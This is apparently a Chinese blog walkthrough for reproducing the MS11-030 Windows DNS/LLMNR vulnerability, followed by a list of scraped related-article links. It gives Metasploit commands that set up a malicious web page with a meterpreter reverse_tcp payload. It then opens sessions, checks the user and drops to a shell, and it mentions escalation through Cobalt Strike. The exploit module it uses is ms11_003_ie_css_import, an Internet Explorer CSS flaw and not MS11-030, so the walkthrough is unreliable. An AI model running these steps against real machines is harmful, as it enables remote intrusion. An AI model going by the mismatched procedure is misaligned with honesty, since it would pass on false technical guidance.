MS11-030:DNS 解析中的漏洞允许远程代码执行 (2509553)

安装的 Windows DNS 客户端处理链接-本地多播名称解析 (LLMNR) 查询的方法中存在一个缺陷,攻击者可利用此缺陷在 NetworkService 帐户的上下文中执行任意代码。

请注意,Windows XP 和 2003 不支持 LLMNR。要在这些平台上成功利用此漏洞,需要本地访问权限以及运行特殊应用程序的权限。但是,在 Windows Vista、2008、7 和 2008 R2 中,可以远程利用此漏洞。

Microsoft 已发布一系列用于 Windows XP、2003、Vista、2008、7 和 2008 R2 的修补程序。

复现准备

靶机:Win xp,2003,win7,and 2008R2

攻击机:kali

漏洞扫描

使用Nessus进行漏洞扫描,发现主机存在ms11-030漏洞

漏洞利用

启动msf

msfconsole

选择漏洞利用exp

use exploit/windows/browser/ms11_003_ie_css_import

查看配置参数

show options

设置生成的恶意网页的URL为baidu.com

为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080

设置LHOST以绑定本地IP

运行命令“exploit”或者“run”开始进行攻击,

生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页

设置攻击载荷

set payload windows/meterpreter/reverse_tcp

目标用户上线成功,回连攻击机

sessions   列出所有会话
sessions -i 1   进入1号会话
getuid   查看当前用户
shell    进入交换式cmd界面
chcp 65001 乱码编译

可以看到获取到IP地址

建议开启windows更新,开启防火墙。打上对应的补丁包

(同时可以利用MSF配合CS上线提权)

MS11-030-DNS 解析漏洞复现相关推荐

  1. nginx 上传文件漏洞_nginx解析漏洞复现

    nginx解析漏洞复现 一.漏洞描述 该漏洞与nginx.php版本无关,属于用户配置不当造成的解析漏洞 二.漏洞原理 1. 由于nginx.conf的如下配置导致nginx把以'.php'结尾的文件 ...

  2. Apache多后缀解析漏洞复现(apache_parsing_vulnerability)

    漏洞原理 apahe解析文件时候有一特性,Apache默认一个文件可以有多个以点分割的后缀,apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别 如果运维人员给.php后缀的 ...

  3. 【linux】 apache多后缀文件解析漏洞复现

    文章目录 一. 漏洞描述 二. 漏洞原理 三. 实验环境 1. apache版本 2. 在网站根目录我们建一个index.php,测试是否解析 3. 修改文件名测试 4. 用文件名不包含php的文件测 ...

  4. php目录遍历漏洞复现,nginx解析漏洞,配置不当,目录遍历漏洞环境搭建、漏洞复现...

    nginx解析漏洞,配置不当,目录遍历漏洞复现 1.Ubuntu14.04安装nginx-php5-fpm 安装了nginx,需要安装以下依赖 sudo apt-get install libpcre ...

  5. IIS6.0目录解析漏洞原理/复现

    目录解析漏洞原理 IIS6.0版本存在目录解析漏洞 , ,asp格式命名的文件夹,其目录下的所有文件都会被IIS当做asp文件来解析 漏洞复现 环境准备 Windows 2003系统 , IIS 6. ...

  6. IIS6.0文件解析漏洞原理/复现

    IIS文件解析漏洞原理 IIS6.0存在文件解析漏洞 , 文件名中分号( ; )后面的内容不会被解析 比如 a.asp;jpg 文件 会被IIS解析成 a.asp 这个漏洞是逻辑上的问题,IIS6.0 ...

  7. 文件上传漏洞总结(含原因+防御措施)+白名单+黑名单+内容、头+解析漏洞/修补方案

    文件上传漏洞简单总结+白名单+黑名单+内容.头+解析漏洞/修补方案 问题 什么是文件上传漏洞? 危害? 防御措施? 文件上传(验证/绕过)措施? 前端 js类绕过? 后端 黑名单绕过 特殊解析后缀 . ...

  8. Apache漏洞复现

    目录 1.Apache多后缀解析漏洞复现(apache_parsing_vulnerability) 漏洞防御 2.Apache换行解析漏洞复现(CVE-2017-15715) 漏洞防御 3.CVE- ...

  9. nginx解析漏洞简单复现及修复

    Nginx简介 Nginx是一款轻量级的web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,其特点是占内存小.并发能力强:国内使用Nginx的有百度.京东.新浪.网易.腾讯.淘宝等 ...

最新文章

  1. matlab7.0怎么用,matlab7.0中simulink使用
  2. postgres sql 多表联合查询_从零学会SQL-多表查询
  3. Ansible — Modules
  4. C++和MATLAB混合编程-DLL篇
  5. 电路常识性概念(2)-电容
  6. L2-5 集合相似度 (set的应用)
  7. POJ1011———Sticks
  8. Zurmo - - 国际化(翻译)
  9. nsis出错_nsis error,教您电脑总是提示nsis error怎么办
  10. mysql占用CPU超过100%
  11. 团!结就是力量!团!结就是力量!小鸟云拼团云主机【低至10元/月】
  12. [原]我和她同居的日子 一
  13. android平板值得买吗,最值得买大推荐 全新安卓平板你选谁?
  14. 区块链应用成功案例有哪些?
  15. Android获取当前位置(GPS和网络定位)
  16. Tyvj 1041 表达式计算2
  17. audacity VS2010 工程搭建
  18. wireshark抓包分析FTP
  19. buuctf刷题 3(1个sstl模板注入 1个session伪造 以及php)
  20. mysql update用法_mysql update语句的用法详解

热门文章

  1. python教程1009python教程_GitHub - gyl1009/codeparkshare: Python初学者(零基础学习Python、Python入门)书籍、视频、资料、社区推荐...
  2. 《奇点临近》的一些优秀读后感
  3. 【ICCV2019 reid】Self-training with progressive augmentation for unsupervised cross-domain person reid
  4. osgEarth2.10.2中关于空间参考系的一些理解
  5. 张艾迪(创始人):23岁天才的创业史
  6. ROS基础(四)——话题消息的定义与使用
  7. 2022.7.11~8.1纪中游记
  8. 一些关于dagger2的理解
  9. css字行高怎么设,css文本行高怎么设置-电脑自学网
  10. Java基础语法(汉罗塔)